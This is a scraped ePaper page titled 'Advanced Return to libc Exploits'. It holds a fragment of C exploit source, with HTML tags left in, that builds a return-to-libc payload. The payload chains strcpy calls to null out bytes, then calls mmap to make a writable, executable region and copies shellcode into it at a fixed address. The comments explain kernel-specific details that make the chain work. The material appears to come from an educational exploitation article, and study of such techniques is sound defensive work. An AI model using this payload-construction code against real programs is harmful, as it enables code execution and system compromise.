Advanced Return to libc Exploits
Advanced Return to libc Exploits
Advanced Return to libc Exploits
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
{<br />
char lg[sizeof(struct ov) + sizeof(struct ourbuf) + 4 + 1];<br />
char *env[2] = { lg, 0 };<br />
struct ourbuf thebuf;<br />
struct ov theov;<br />
int i;<br />
memset(theov.scratch, 'X', sizeof(theov.scratch));<br />
if (argc == 2 && !strcmp("testing", argv[1])) {<br />
for (i = 0; i < sizeof(theov.scratch); i++)<br />
theov.scratch[i] = i + 0x10;<br />
theov.eip = 0x05060708;<br />
} else {<br />
/* To make the code easier <strong>to</strong> read, we initially return in<strong>to</strong> "ret". This will<br />
return in<strong>to</strong> the address at the beginning of our "zero1" struct. */<br />
theov.eip = PLAIN_RET;<br />
}<br />
memset(&thebuf, 'Y', sizeof(thebuf));<br />
thebuf.zero1.func = STRCPY;<br />
thebuf.zero1.leave_ret = POPSTACK;<br />
/* The following assignment puts in<strong>to</strong> "param1" the address of the least<br />
significant byte of the "offset" field of "mmap_args" structure. This byte<br />
will be nullified by the strcpy call. */<br />
thebuf.zero1.param1 = FRAMES + offse<strong>to</strong>f(struct ourbuf, mymmap) +<br />
offse<strong>to</strong>f(struct mmap_args, offset);<br />
thebuf.zero1.param2 = PTR_TO_NULL;<br />
thebuf.zero2.func = STRCPY;<br />
thebuf.zero2.leave_ret = POPSTACK;<br />
/* Also the "start" field must be the multiple of page. We have <strong>to</strong> nullify<br />
its least significant byte with a strcpy call. */<br />
thebuf.zero2.param1 = FRAMES + offse<strong>to</strong>f(struct ourbuf, mymmap) +<br />
offse<strong>to</strong>f(struct mmap_args, start);<br />
thebuf.zero2.param2 = PTR_TO_NULL;<br />
thebuf.mymmap.func = MMAP;<br />
thebuf.mymmap.leave_ret = POPSTACK;<br />
thebuf.mymmap.start = MMAP_START + 1;<br />
thebuf.mymmap.length = 0x01020304;<br />
/* Luckily, 2.4.x kernels care only for the lowest byte of "prot", so we may<br />
put non-zero junk in the other bytes. 2.2.x kernels are more picky; in such<br />
case, we would need more zeroing. */<br />
thebuf.mymmap.prot =<br />
0x01010100 | PROT_EXEC | PROT_READ | PROT_WRITE;<br />
/* Same as above. Be careful not <strong>to</strong> include MAP_GROWS_DOWN */<br />
thebuf.mymmap.flags =<br />
0x01010200 | MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS;<br />
thebuf.mymmap.fd = 0xffffffff;<br />
thebuf.mymmap.offset = 0x01021001;<br />
/* The final "strcpy" call will copy the shellcode in<strong>to</strong> the freshly mmapped<br />
area at MMAP_START. Then, it will return not anymore in<strong>to</strong> POPSTACK, but at<br />
MMAP_START+1.<br />
*/